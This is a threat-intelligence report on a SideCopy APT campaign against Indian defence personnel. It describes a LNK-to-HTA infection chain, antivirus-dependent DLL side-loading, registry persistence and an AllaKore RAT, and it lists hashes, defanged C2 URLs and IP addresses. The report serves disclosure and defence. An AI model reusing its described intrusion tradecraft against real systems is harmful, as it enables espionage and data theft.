Background
In September 2020, Quick Heal revealed an espionage operation against the Indian Defense forces and armed forces personnel and named it Operation SideCopy. The operation began in early 2019, and its attackers mainly used the TTPs of the Sidewinder APT group to carry out attacks, hence it was named Operation SideCopy.
In July 2021, Cisco Talos researchers tracked the attackers behind Operation SideCopy as an independent group and named it the SideCopy APT group. The report disclosed that the group used various attack weapons, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].
Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.
Overview
In this attack activity, SideCopy's infection chain is relatively consistent with the previous attack activity. It uses a malicious LNK file as the entry point, followed by a complex infection chain involving multiple layers of file nesting to pass the final payload. Based on analysis, some characteristics of this attack activity are as follows:
- Spear-phishing emails, with LNK files in compressed packages as the attack entry point;
- Loading and executing subsequent payloads in memory without files;
- The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++;
- The bait content is related to the Indian Ministry of Defense.
The attack process is shown in the following figure:
Sample Analysis
0x01 Basic Information
The captured sample is a compressed package with the following basic information:
| - | - |
|---|---|
| Filename | Grant-of-Risk-and-Hardship-Allowance-JCOs-OR.zip |
| MD5 | 577419F202182F6E933C1CF83EF922EA |
| File size | 325484 bytes |
| File type | Zip |
After decompression, it contains a hidden folder “Adobe” and a bait LNK file. The LNK file name is "Grant of Risk and Hardship Allowance."
Analyzing the LNK file, it accesses the C2 using mshta.exe in the system to download and execute subsequent payloads.
0x02 Phase One
Accessing the link in the LNK file will redirect to “https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta” to download a piece of JS code to execute.
Its main function is to load DLL in memory, decrypt the embedded data in the JS code through the functions in the DLL, and drop the PDF bait.
The function "openthefile" decrypts and releases the PDF bait.
The displayed PDF bait is shown below:
Then, it obtains the information of installed antivirus software, concatenates it with the string "anvaro =," and uploads it to “https://kcps.edu[.]in/css/fonts/files/avena/” using the POST method.
Creates the directory “C:\ProgramData\HP”, accesses the C2 to download data and saves it in “C:\ProgramData\HP\jquery.hta” and “C:\ProgramData\HP\jscy.hta” files, and then executes them.
0x03 Phase Two
The downloaded HTA files are similar to Phase One. They load DLL in memory and first collect information of installed antivirus software in the system using WMI. Then, it uses a piece of hardcoded data and antivirus software information as parameters to call the SearchProducts function in the DLL.
In the SearchProducts function, it first compares the antivirus software to decide how to start the subsequent payloads. The antivirus software information is as follows:
| - | - |
|---|---|
| antivirus software information | |
| Kaspersky | Avira |
| Quick Heal | Bitdefender |
| Avast | WindowsDefender |
When the Indian antivirus software "Quick Heal" is present, the first step is to copy Credwiz.exe file in the system to the directory “C:\Users\Public\smitpr” and rename it as “crezly.exe”. Then, decrypt the DLL data and name it as “DUser.dll” in the “C:\Users\Public\smitpr” directory. Next, decrypt the EXE data and drop the program “simsre.exe” in the “smitpr” directory. Finally, sleep for 30 seconds, and then call the released “crezly.exe” program to side-load the malicious “DUser.dll”.
During the execution, a bat file is generated, which adds a startup item for the crezly.exe program through the registry.
When the antivirus software is Kaspersky, Avast, Bitdefender, WindowsDefender, or others, the way of releasing the malicious component is basically the same as that of the Indian antivirus software "Quick Heal", except that it will sleep for one minute and then start the released simsre.exe program directly, and the program added to the startup item through the registry is also simsre.exe.
It is worth mentioning that when it is not the Indian antivirus software "Quick Heal", a tmplate.txt file will be generated in the %temp% directory for logging, and the author recorded in the log is "Mahesh Chand", who is an Indian and claims to be a former Microsoft regional director on his Twitter profile.
AllaKore RAT
The released simsre.exe is a AllaKore RAT (also known as Cyrus) commonly used by SideCopy. Its source code is open source on GitHub and has been modified by the SideCopy group as part of its own arsenal. The file information is as follows:
| - | - |
|---|---|
| Filename | simsre.exe |
| MD5 | 087E366A4BECCBECB7D7CDB5C2F73088 |
| File size | 8507904 bytes |
| File type | EXE |
The IP address that captured Allakore RAT accessed is 185.229.119.60, and the port is 9134. Its main functions include:
- Keylogger
- Screenshots
- List folders and files
- Upload/download files
- Steal clipboard data
- Change wallpaper
- Remote control
DUser.dll
The sideloaded DUser.dll is actually a loader that loads and executes the released simsre.exe.
Attribution & Association
During the analysis of the sample, we found that this attack mainly targets the India region. First, the bait content is mainly related to the Indian Ministry of Defense, and second, the default decoding method was selected during decryption. The bait content and some subsequent payloads can only be correctly decrypted if the system region setting of the current computer is set to English (India).
In terms of code logic analysis of captured attack samples, we found that the malicious code used in this attack is almost identical to the commonly used attack methods of the SideCopy group.
By associating with the initial lnk file of this attack, we also discovered another similar attack sample.
Its bait is the documentation related to the development of the nuclear-capable medium-range submarine-launched ballistic missile (K4 missile) for the armed Alihant-class submarines of the Indian Defense Research and Development Organization (DRDO). The bait content is as follows:
Its execution process is basically the same as the above analysis. The difference is that its final payload DUser.dll is a program written in C++ language, with a high undetected rate on VirusTotal. Its C2 is 144.91.72.17:8080, and it also carries PDB path information.
In addition, during the extended analysis, we also found a large number of lnk file-based attack samples recently used by the SideCopy group.
In last year, we also discovered that the SideCopy group used pornographic images as lnk file icons for attacks, which can be described as a tried and tested method.
Summary
The SideCopy group mainly copies the TTPs of the Sidewinder APT group for attacks. It has come to public eye in recent years, and its attack methods and weapon code are relatively immature compared to other threat groups in the same region, with most of its tools using open source code and tools available on the internet. More importantly, we have previously disclosed its attacks on multiple platforms such as Linux and macOS [2]. QiAnXin Threat Intelligence Center will conduct long-term traceability and follow-up on this threat actor, timely discovering security threats and responding to them.
The captured samples mainly targets the South Asian region, and domestic users are not affected. The QiAnXin Red Raindrop team reminds users to beware of waterhole attacks and not to open links with unknown sources shared on social media, not to click on email attachments from unknown sources, not to run unknown files with exaggerated titles, and not to install apps from unofficial sources. Also, be sure to back up important files in a timely manner and update and install patches.
If there is a need to run an application of unknown origin, you can first use the QiAnXin Threat Intelligence File Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situation Awareness, all support accurate detection of such attacks.
IOCs
MD5
577419F202182F6E933C1CF83EF922EA
3E3D3F78A07BAB5A3342E0414E48D787
087E366A4BECCBECB7D7CDB5C2F73088
26E41AF2CA9EA82C244C1AA1EC77654A
FA6C832E22F978B8210C0630DB69E6A2
EFCC2BF765993711CC9E4E86D2EBB876
191C389140293C782D7A2304893151E2
6528A9F0AF30DF7F4211EF8B341ACC2E
0725318B4F5C312EEAF5EC9795A7E919
AB11B91F97D7672DA1C5B42C9ECC6D2E
CBAA7FC86E4F1A30A155F60323FDB72A
036DA574B5967C71951F4E14D000398C
2E19B7A2BBDC8082024D259E27E86911
087E366A4BECCBECB7D7CDB5C2F73088
3F22B345ED1F9E244DB034F9AF49E707
EDE163036A1754C71D6FF11B266B91CE
5BE4E4884F4E021BA975CBED0A7E9C25
F7D1E515CB84F6DC2D0349AB93BD4E05
63789CACECC1ABD9669344516ADB4120
9B06472E5ACF2311D0AF62D638A8E51A
D129B81C1D40C34AC628835E144A4740
BA2ADA448B8471789C0EF3B3345597FE
6B3F45F7A6758D198A317DE43D51E669
A65EB385C9019C712EA513E4C5C25152
1A1C8C0F5CAFB7DF661086BCB804154C
0C44DA9103FB26DAFC710E83E95AD1C2
61427F7A200D7A21C1CF38FFE2FD4EE5
441F580A36757CF20493029B055F581E
URL
https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta
https://kcps.edu[.]in/css/fonts/files/avena/
https://kcps.edu[.]in/css/fonts/files/ntsfonts/
https://kcps.edu[.]in/css/fonts/files/jquery/
https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta
https://cornerstonebeverly[.]org/js/files/ntfonts/avena/
https://cornerstonebeverly[.]org/js/files/ntfonts/
https://hpuniversity[.]in/uploads/files/women/start
https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip
https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip
https://hpuniversity[.]in/uploadsssss/files/women/Women.zip
https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip
http://hpuniversity[.]in/filessss/software/SoftWare.zip
https://hpuniversity[.]in/documents/women/Women.zip
https://hpuniversity[.]in/ documents /assignment1/ assignment1.zip
https://hpuniversity[.]in/filessss/principles/Principles.zip https://hpuniversity[.]in/documents/survey/start/2.hta
IP
89.117.63.146:9921
185.229.119.60:9134
144.91.72.17:8080
Reference
[1]. https://blog.talosintelligence.com/2021/07/sidecopy.html
[2]. https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/